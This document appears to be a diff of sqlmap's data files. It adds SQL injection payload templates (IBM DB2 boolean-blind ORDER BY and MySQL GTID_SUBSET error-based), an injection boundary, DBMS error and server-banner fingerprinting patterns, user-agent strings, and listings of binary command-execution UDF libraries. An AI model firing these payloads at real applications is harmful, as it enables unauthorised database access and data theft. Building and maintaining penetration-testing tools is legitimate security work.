Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400
Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.320
Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284

BIN
data/txt/wordlist.tx_
View File

Binary file not shown.

BIN
data/udf/mysql/linux/32/lib_mysqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/mysql/linux/64/lib_mysqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

4
data/xml/banner/generic.xml
View File

@@ -34,7 +34,7 @@
<!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
<regexp value="Windows.*\b10\.0">
<info type="Windows" distrib="2016|10"/>
<info type="Windows" distrib="2019|2016|10"/>
</regexp>
<regexp value="Windows.*\b6\.3">
@@ -151,7 +151,7 @@
<info type="Linux" distrib="Ubuntu"/>
</regexp>
<!-- Unices -->
<!-- BSD -->
<regexp value="FreeBSD">
<info type="FreeBSD"/>

4
data/xml/banner/mysql.xml
View File

@@ -64,6 +64,10 @@
<info dbms_version="1" type="Linux" distrib="Debian" release="12" codename="bookworm"/>
</regexp>
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+trixie">
<info dbms_version="1" type="Linux" distrib="Debian" release="13" codename="trixie"/>
</regexp>
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
<info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
</regexp>

101
data/xml/banner/server.xml
View File

@@ -10,7 +10,7 @@
<!-- Microsoft IIS -->
<regexp value="Microsoft-IIS/(10\.0)">
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|10"/>
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2019|2016|10"/>
</regexp>
<regexp value="Microsoft-IIS/(8\.5)">
@@ -74,23 +74,27 @@
<!-- Apache: CentOS -->
<regexp value="Apache/2\.0\.46 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="3.9"/>
<info type="Linux" distrib="CentOS" release="3"/>
</regexp>
<regexp value="Apache/2\.0\.52 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="4.9"/>
<info type="Linux" distrib="CentOS" release="4"/>
</regexp>
<regexp value="Apache/2\.2\.3 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="5.10"/>
<info type="Linux" distrib="CentOS" release="5"/>
</regexp>
<regexp value="Apache/2\.2\.15 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="6.8"/>
<info type="Linux" distrib="CentOS" release="6"/>
</regexp>
<regexp value="Apache/2\.4\.6 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="7-1708"/>
<info type="Linux" distrib="CentOS" release="7"/>
</regexp>
<regexp value="Apache/2\.4\.37 \(CentOS\)">
<info type="Linux" distrib="CentOS" release="8"/>
</regexp>
<!-- Apache: Debian -->
@@ -131,36 +135,32 @@
<info type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
</regexp>
<regexp value="Apache/1\.3\.34 \(Debian GNU\/Linux\)">
<info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
</regexp>
<regexp value="Apache/2\.2\.3 \(Debian\)">
<info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
</regexp>
<regexp value="Apache/2\.2\.6 \(Debian\)">
<info type="Linux" distrib="Debian" release="4.0" codename="etch" updated="True"/>
<info type="Linux" distrib="Debian" release="4" codename="etch"/>
</regexp>
<regexp value="Apache/2\.2\.9 \(Debian\)">
<info type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
<info type="Linux" distrib="Debian" release="5" codename="lenny"/>
</regexp>
<regexp value="Apache/2\.2\.16 \(Debian\)">
<info type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
<info type="Linux" distrib="Debian" release="6" codename="squeeze"/>
</regexp>
<regexp value="Apache/2\.2\.22 \(Debian\)">
<info type="Linux" distrib="Debian" release="7.0" codename="wheezy"/>
<info type="Linux" distrib="Debian" release="7" codename="wheezy"/>
</regexp>
<regexp value="Apache/2\.4\.10 \(Debian\)">
<info type="Linux" distrib="Debian" release="8.0" codename="jessie"/>
<info type="Linux" distrib="Debian" release="8" codename="jessie"/>
</regexp>
<regexp value="Apache/2\.4\.25 \(Debian\)">
<info type="Linux" distrib="Debian" release="9.0" codename="stretch"/>
<info type="Linux" distrib="Debian" release="9" codename="stretch"/>
</regexp>
<regexp value="Apache/2\.4\.38 \(Debian\)">
<info type="Linux" distrib="Debian" release="10" codename="buster"/>
</regexp>
<!-- Apache: Fedora -->
@@ -293,6 +293,31 @@
<info type="Linux" distrib="Fedora" release="27"/>
</regexp>
<regexp value="Apache/2\.4\.33 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="28"/>
</regexp>
<regexp value="Apache/2\.4\.34 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="29"/>
</regexp>
<regexp value="Apache/2\.4\.39 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="30"/>
</regexp>
<regexp value="Apache/2\.4\.41 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="31"/>
</regexp>
<regexp value="Apache/2\.4\.43 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="32"/>
</regexp>
<regexp value="Apache/2\.4\.46 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="33"/>
</regexp>
<!-- Apache: FreeBSD -->
<regexp value="Apache/2\.0\.16 \(FreeBSD\)">
@@ -407,6 +432,14 @@
<info type="FreeBSD" release="11.1"/>
</regexp>
<regexp value="Apache/2\.4\.39 \(FreeBSD\)">
<info type="FreeBSD" release="11.3"/>
</regexp>
<regexp value="Apache/2\.4\.46 \(FreeBSD\)">
<info type="FreeBSD" release="12.2"/>
</regexp>
<!-- Apache: Mandrake / Mandriva -->
<regexp value="Apache/1\.3\.6 \(Unix\)\s+\(Mandrake/Linux\)">
@@ -587,6 +620,10 @@
<info type="Linux" distrib="Red Hat" release="Enterprise 7" codename="Maipo"/>
</regexp>
<regexp value="Apache/2\.4\.37 \(Red Hat\)">
<info type="Linux" distrib="Red Hat" release="Enterprise 8" codename="Ootpa"/>
</regexp>
<!-- Apache: SuSE -->
<regexp value="Apache/1\.3\.6 \(Unix\) \(SuSE/Linux\)">
@@ -714,6 +751,14 @@
<info type="Linux" distrib="SuSE" release="42.2|42.3"/>
</regexp>
<regexp value="Apache/2\.4\.33 \(Linux/SuSE\)">
<info type="Linux" distrib="SuSE" release="15"/>
</regexp>
<regexp value="Apache/2\.4\.43 \(Linux/SuSE\)">
<info type="Linux" distrib="SuSE" release="15.2"/>
</regexp>
<!-- Apache: Ubuntu -->
<regexp value="Apache/2\.0\.50 \(Ubuntu\)">
@@ -800,6 +845,22 @@
<info type="Linux" distrib="Ubuntu" release="17.10" codename="artful"/>
</regexp>
<regexp value="Apache/2\.4\.29 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="18.04" codename="bionic"/>
</regexp>
<regexp value="Apache/2\.4\.34 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="18.10" codename="cosmic"/>
</regexp>
<regexp value="Apache/2\.4\.38 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="19.04" codename="disco"/>
</regexp>
<regexp value="Apache/2\.4\.41 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="19.10|20.04" codename="eoan|focal"/>
</regexp>
<!-- Nginx -->
<regexp value="nginx$">

16
data/xml/banner/x-powered-by.xml
View File

@@ -19,6 +19,22 @@
<info technology="EasyEngine" tech_version="1"/>
</regexp>
<regexp value="Phusion Passenger ([\d\.]+)">
<info technology="Phusion Passenger" tech_version="1"/>
</regexp>
<regexp value="Craft CMS">
<info technology="Craft CMS"/>
</regexp>
<regexp value="Express">
<info technology="Express"/>
</regexp>
<regexp value="WP Engine">
<info technology="WP Engine"/>
</regexp>
<regexp value="PleskLin">
<info technology="Plesk" type="Linux"/>
</regexp>

9
data/xml/boundaries.xml
View File

@@ -213,6 +213,15 @@ Formats:
<suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>%'</prefix>
<suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>

44
data/xml/errors.xml
View File

@@ -1,13 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- MySQL -->
<dbms value="MySQL">
<error regexp="SQL syntax.*?MySQL"/>
<error regexp="Warning.*?\Wmysqli?_"/>
<error regexp="MySQLSyntaxErrorException"/>
<error regexp="valid MySQL result"/>
<error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
<error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
<error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
<error regexp="Unknown column '[^ ]+' in 'field list'"/>
<error regexp="MySqlClient\."/>
<error regexp="com\.mysql\.jdbc"/>
@@ -15,13 +16,11 @@
<error regexp="Pdo[./_\\]Mysql"/>
<error regexp="MySqlException"/>
<error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
<error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
<error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
<error regexp="is not supported by MemSQL" fork="MemSQL"/>
<error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
</dbms>
<!-- PostgreSQL -->
<dbms value="PostgreSQL">
<error regexp="PostgreSQL.*?ERROR"/>
<error regexp="Warning.*?\Wpg_"/>
@@ -37,7 +36,6 @@
<error regexp="PSQLException"/>
</dbms>
<!-- Microsoft SQL Server -->
<dbms value="Microsoft SQL Server">
<error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
<error regexp="OLE DB.*? SQL Server"/>
@@ -59,7 +57,6 @@
<error regexp="SQL(Srv|Server)Exception"/>
</dbms>
<!-- Microsoft Access -->
<dbms value="Microsoft Access">
<error regexp="Microsoft Access (\d+ )?Driver"/>
<error regexp="JET Database Engine"/>
@@ -68,7 +65,6 @@
<error regexp="Syntax error \(missing operator\) in query expression"/>
</dbms>
<!-- Oracle -->
<dbms value="Oracle">
<error regexp="\bORA-\d{5}"/>
<error regexp="Oracle error"/>
@@ -83,19 +79,18 @@
<error regexp="OracleException"/>
</dbms>
<!-- IBM DB2 -->
<dbms value="IBM DB2">
<error regexp="CLI Driver.*?DB2"/>
<error regexp="DB2 SQL error"/>
<error regexp="\bdb2_\w+\("/>
<error regexp="SQLSTATE.+SQLCODE"/>
<error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
<error regexp="com\.ibm\.db2\.jcc"/>
<error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
<error regexp="Pdo[./_\\]Ibm"/>
<error regexp="DB2Exception"/>
<error regexp="ibm_db_dbi\.ProgrammingError"/>
</dbms>
<!-- Informix -->
<dbms value="Informix">
<error regexp="Warning.*?\Wifx_"/>
<error regexp="Exception.*?Informix"/>
@@ -115,7 +110,6 @@
<error regexp="Pdo[./_\\]Firebird"/>
</dbms>
<!-- SQLite -->
<dbms value="SQLite">
<error regexp="SQLite/JDBCDriver"/>
<error regexp="SQLite\.Exception"/>
@@ -130,15 +124,15 @@
<error regexp="SQLiteException"/>
</dbms>
<!-- SAP MaxDB -->
<dbms value="SAP MaxDB">
<error regexp="SQL error.*?POS([0-9]+)"/>
<error regexp="Warning.*?\Wmaxdb_"/>
<error regexp="DriverSapDB"/>
<error regexp="-3014.*?Invalid end of SQL statement"/>
<error regexp="com\.sap\.dbtech\.jdbc"/>
<error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
</dbms>
<!-- Sybase -->
<dbms value="Sybase">
<error regexp="Warning.*?\Wsybase_"/>
<error regexp="Sybase message"/>
@@ -148,7 +142,6 @@
<error regexp="com\.sybase\.jdbc"/>
</dbms>
<!-- Ingres -->
<dbms value="Ingres">
<error regexp="Warning.*?\Wingres_"/>
<error regexp="Ingres SQLSTATE"/>
@@ -156,39 +149,36 @@
<error regexp="com\.ingres\.gcf\.jdbc"/>
</dbms>
<!-- Frontbase -->
<dbms value="Frontbase">
<dbms value="FrontBase">
<error regexp="Exception (condition )?\d+\. Transaction rollback"/>
<error regexp="com\.frontbase\.jdbc"/>
<error regexp="Syntax error 1. Missing"/>
<error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
</dbms>
<!-- HSQLDB -->
<dbms value="HSQLDB">
<error regexp="Unexpected end of command in statement \["/>
<error regexp="Unexpected token.*?in statement \["/>
<error regexp="org\.hsqldb\.jdbc"/>
</dbms>
<!-- H2 -->
<dbms value="H2">
<error regexp="org\.h2\.jdbc"/>
<error regexp="\[42000-192\]"/>
</dbms>
<!-- MonetDB -->
<dbms value="MonetDB">
<error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
<error regexp="\[MonetDB\]\[ODBC Driver"/>
<error regexp="nl\.cwi\.monetdb\.jdbc"/>
</dbms>
<!-- Apache Derby -->
<dbms value="Apache Derby">
<error regexp="Syntax error: Encountered"/>
<error regexp="org\.apache\.derby"/>
<error regexp="ERROR 42X01"/>
</dbms>
<!-- Vertica -->
<dbms value="Vertica">
<error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
<error regexp="/vertica/Parser/scan"/>
@@ -197,13 +187,12 @@
<error regexp="com\.vertica\.dsi\.dataengine"/>
</dbms>
<!-- Mckoi -->
<dbms value="Mckoi">
<error regexp="com\.mckoi\.JDBCDriver"/>
<error regexp="com\.mckoi\.database\.jdbc"/>
<error regexp="&lt;REGEX_LITERAL&gt;"/>
</dbms>
<!-- Presto -->
<dbms value="Presto">
<error regexp="com\.facebook\.presto\.jdbc"/>
<error regexp="io\.prestosql\.jdbc"/>
@@ -211,14 +200,21 @@
<error regexp="UNION query has different number of fields: \d+, \d+"/>
</dbms>
<!-- Altibase -->
<dbms value="Altibase">
<error regexp="Altibase\.jdbc\.driver"/>
</dbms>
<!-- MimerSQL -->
<dbms value="MimerSQL">
<error regexp="com\.mimer\.jdbc"/>
<error regexp="Syntax error,[^\n]+assumed to mean"/>
</dbms>
<dbms value="CrateDB">
<error regexp="io\.crate\.client\.jdbc"/>
</dbms>
<dbms value="Cache">
<error regexp="encountered after end of query"/>
<error regexp="A comparison operator is required here"/>
</dbms>
</root>

44
data/xml/payloads/boolean_blind.xml
View File

@@ -824,7 +824,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -845,7 +844,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1193,7 +1191,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1214,7 +1211,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1332,6 +1328,44 @@ Tag: <test>
</details>
</test>
<test>
<title>IBM DB2 boolean-based blind - ORDER BY clause</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>3</clause>
<where>1</where>
<vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
<request>
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
</request>
<response>
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>3</clause>
<where>1</where>
<vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
<request>
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
</request>
<response>
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Works in MySQL, Oracle, etc. -->
<test>
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
@@ -1452,7 +1486,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1474,7 +1507,6 @@ Tag: <test>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>

234
data/xml/payloads/error_based.xml
View File

@@ -91,6 +91,46 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
<request>
<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1,8,9</clause>
<where>1</where>
<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
<request>
